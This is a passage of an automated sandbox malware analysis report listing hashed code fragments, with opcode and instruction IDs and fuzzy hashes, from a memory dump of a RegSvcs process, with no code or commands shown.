                                                  • Opcode ID: 0019e0bdcaaaeb1090dd1b7d69aadb587dee4b6951bb69b43a927951bbe844ce
                                                  • Instruction ID: d47610b74eddd4241af848e2b97afb7d333162acc44d0c1cb3ddfef271cb33a7
                                                  • Opcode Fuzzy Hash: 0019e0bdcaaaeb1090dd1b7d69aadb587dee4b6951bb69b43a927951bbe844ce
                                                  • Instruction Fuzzy Hash: DC11E770F113158BEF649724D8907BE73B3EF85704F2014BAD50ADB380EA35AE468B82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17846abf6fe3f042d4851754755a929b166ce850b3e58bcecba4fa3d42ab1d43
                                                  • Instruction ID: 7bb58be8b26d86fe131957bf48019285fd421e7b7fe432593b43038dacf3cc8b
                                                  • Opcode Fuzzy Hash: 17846abf6fe3f042d4851754755a929b166ce850b3e58bcecba4fa3d42ab1d43
                                                  • Instruction Fuzzy Hash: 35114976F112185FDF54DAA8EC106FF77EADBC4210F10403AE94BDB244EA24AC0287E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 72f571974c67f416155a07cc7776e23d28e369931ca708b9cb3245b6d2cf54c2
                                                  • Instruction ID: 9e743cba6fc1530a0c118e467717ceb4f00184b596a5f55071a764f5bcd616db
                                                  • Opcode Fuzzy Hash: 72f571974c67f416155a07cc7776e23d28e369931ca708b9cb3245b6d2cf54c2
                                                  • Instruction Fuzzy Hash: 79116175B112254FEF54DAA8D8146AE73E6EBC8751B104539D906EB344EE24EC028BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66c1b4ede48119bed96e53bd2b940a12d3a22de3cf26c487490c851f3e10d374
                                                  • Instruction ID: 7924b8333ac5d48ca02bbc8f6564d809b369db5cf58bb5d0633aadb543ab20e1
                                                  • Opcode Fuzzy Hash: 66c1b4ede48119bed96e53bd2b940a12d3a22de3cf26c487490c851f3e10d374
                                                  • Instruction Fuzzy Hash: 5C11C231E013289BCB64CB79CC504DEFBB5EB8A340F14956AE406EB340DA31AA40CFD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9920dcce2b949ee0b22243c5ed88b9befb3d46bf2abb9b9a05c24aff7aa8d878
                                                  • Instruction ID: 7d22f105e943a11b5c2a80ba1c378cc0f783b83c6c411ffac3904366ce450c63
                                                  • Opcode Fuzzy Hash: 9920dcce2b949ee0b22243c5ed88b9befb3d46bf2abb9b9a05c24aff7aa8d878
                                                  • Instruction Fuzzy Hash: EC21F2B5C01619EFCB00CF9AD884ACEFBB8FB49314F10822AE918B7250C3746954CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 518eab5ccf725609bc0e4b050b17b98fc599859e638d714fa29fdfa1fcb6944c
                                                  • Instruction ID: 0f85397c32431defbadd130df56c00057bbcfde5014cc55d971a194aa4ac1128
                                                  • Opcode Fuzzy Hash: 518eab5ccf725609bc0e4b050b17b98fc599859e638d714fa29fdfa1fcb6944c
                                                  • Instruction Fuzzy Hash: 40012839B002201BDB65957D9451B6BB7DBDBC9724F24D43AE20ACB341E965EC4283E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bdd80fa6de83758db2da8ac1e8a9cf52730f2254da3827ce54f27866bdecde9e
                                                  • Instruction ID: d6c3fc8247ecb369b7ca56134ce6df44291023182dfd154a03dac1b5d571a212
                                                  • Opcode Fuzzy Hash: bdd80fa6de83758db2da8ac1e8a9cf52730f2254da3827ce54f27866bdecde9e
                                                  • Instruction Fuzzy Hash: 2B014B39B002204FEFA4D96C9454B6BABD7DBC9714F24983AE10ACB340E965EC438395
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 166677bd54336b018c5475bb9b3ec9eef5f2fe0f38f443508202892b3b64fa6c
                                                  • Instruction ID: e0e5ebbe87eb58fbb160bcaf61692b3e3ab8bbd485cdff0d2d1853c84dac1681
                                                  • Opcode Fuzzy Hash: 166677bd54336b018c5475bb9b3ec9eef5f2fe0f38f443508202892b3b64fa6c
                                                  • Instruction Fuzzy Hash: EA11D0B5D01219EFCB00CF9AD884ACEFBB4FB49314F10812AE918A7250C374A954CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3cf96d410b54e4c6280c271e472d23cc7b3d7be86dc96eb8f604cf6a8626cd40
                                                  • Instruction ID: 0a91422c98413fecf2fa48199e78a10c186b2f76e0b65f880c9c5350ad99d513
                                                  • Opcode Fuzzy Hash: 3cf96d410b54e4c6280c271e472d23cc7b3d7be86dc96eb8f604cf6a8626cd40
                                                  • Instruction Fuzzy Hash: B5016D39B002204FDF64D57C9450B6BABD7DBD9714F24D43AE10ACB340D965ED438391
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24d6e2ab5b849ac103bb010e524f82cfc5c6fba43c74b214767a5f4ec53d5f96
                                                  • Instruction ID: b54eeec0705ca381253e8918d17156a39fc6b28ed21654ed9a39cd6468f10625
                                                  • Opcode Fuzzy Hash: 24d6e2ab5b849ac103bb010e524f82cfc5c6fba43c74b214767a5f4ec53d5f96
                                                  • Instruction Fuzzy Hash: B3014639B002201BDB64D66D9450B2BA7DBDBC9724F24983AE20ACB341E965EC438391
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f2ecdae988054a0eb8b888087d57bd1322bdda9589005898c7a6678568248fdb
                                                  • Instruction ID: 02aa4fdca41add681ef908657d9f074264d804038d5b0be6b0d1b6375c10af72
                                                  • Opcode Fuzzy Hash: f2ecdae988054a0eb8b888087d57bd1322bdda9589005898c7a6678568248fdb
                                                  • Instruction Fuzzy Hash: D601D130B002214FDBA0DA38D9607AA73E6EFC9704F10943AE54FCFB44DA65ED028781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 370821abd7333b27278fb00e5fdd9f14b1977ad57254f9f7c864b9c17dacbf29
                                                  • Instruction ID: 4ca7c56e82adf568bb1c5145784a8e4f80f1b1da3f030f8977747c3d647baea8
                                                  • Opcode Fuzzy Hash: 370821abd7333b27278fb00e5fdd9f14b1977ad57254f9f7c864b9c17dacbf29
                                                  • Instruction Fuzzy Hash: F001F430B002204FDB60EA3CD9A075AB3E6EFC9714F509839E54FCB740EA61EC428781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4941394fc84af1339ae4c0d1aabd781d3283ba06d4a2dd880bf83876e5f71b82
                                                  • Instruction ID: f797609a5ad3e3407987ea6abfb5ba711f6892f9be9cfb4ce92a01d18ee6ecbd
                                                  • Opcode Fuzzy Hash: 4941394fc84af1339ae4c0d1aabd781d3283ba06d4a2dd880bf83876e5f71b82
                                                  • Instruction Fuzzy Hash: B8018131B102204FDBA1DA38D96076A73E6DFC9714F109439E54FCB744DA65ED428780
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cfbeaa62a83fd2b5d49890d10db39837c0b471064f39fd8fb3f8ab71eef925f3
                                                  • Instruction ID: 7a5dfb75c76769d0bae4bc9cc569c9c73f8c34ceb19b0da05906696b4866e2c8
                                                  • Opcode Fuzzy Hash: cfbeaa62a83fd2b5d49890d10db39837c0b471064f39fd8fb3f8ab71eef925f3
                                                  • Instruction Fuzzy Hash: 5DF0F436F053149BEF3448A2A9403B673B5EB84261F161276E901DB290DAF4ED42C2A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fd3fbc8ea4dba8d63ab8e51e147f1c5b2010d5df58b089c99a3c437b63f24f7
                                                  • Instruction ID: 6ee6be07a975b20c4d31dfaf3468271dfe3b1c89d2ac32d5e4530f2fe8f20862
                                                  • Opcode Fuzzy Hash: 1fd3fbc8ea4dba8d63ab8e51e147f1c5b2010d5df58b089c99a3c437b63f24f7
                                                  • Instruction Fuzzy Hash: 4401A431B102244BDB60EA3DD96075A73E6DFC9714F509439E54ECB744DA65EC428781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a599f748ebcad03674edf955f9fc60987eece6e7f605b9d3eff176090602fe9
                                                  • Instruction ID: 44e9bd958be8eb33faf11b3116453bd9ed2a424d2d89ff4779f6f4896971776d
                                                  • Opcode Fuzzy Hash: 1a599f748ebcad03674edf955f9fc60987eece6e7f605b9d3eff176090602fe9
                                                  • Instruction Fuzzy Hash: B0F0F436F113149FEB6448A2A9403B67375EB84250F021276E901DB280DAE4E942C390
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a31a19ef061bc6d177a1464f06c11fda5f1b76a528e77933d60017d26fe3b89b
                                                  • Instruction ID: 9ce396d9769409cea95f05ad3bc05b910ed3c661e287c6fc2c753a70f3832760
                                                  • Opcode Fuzzy Hash: a31a19ef061bc6d177a1464f06c11fda5f1b76a528e77933d60017d26fe3b89b
                                                  • Instruction Fuzzy Hash: 00E0E6B1E343089FEF50D96486457AA7799DF81208F2055A5D415DF342E576DA4147C0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de22157d133b4fbac7f96cc94aa0c1dc2d1c26d04cd4b35d0147cc199a611fb1
                                                  • Instruction ID: 9040e5ea56abfd7c57220c88d20987b23c11d8e1c72313cfa0ac36c7b9d532e0
                                                  • Opcode Fuzzy Hash: de22157d133b4fbac7f96cc94aa0c1dc2d1c26d04cd4b35d0147cc199a611fb1
                                                  • Instruction Fuzzy Hash: BFE08670E3430C67DF10D9748A05B5A769DDF41208F204464D404CF301E576D90147D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%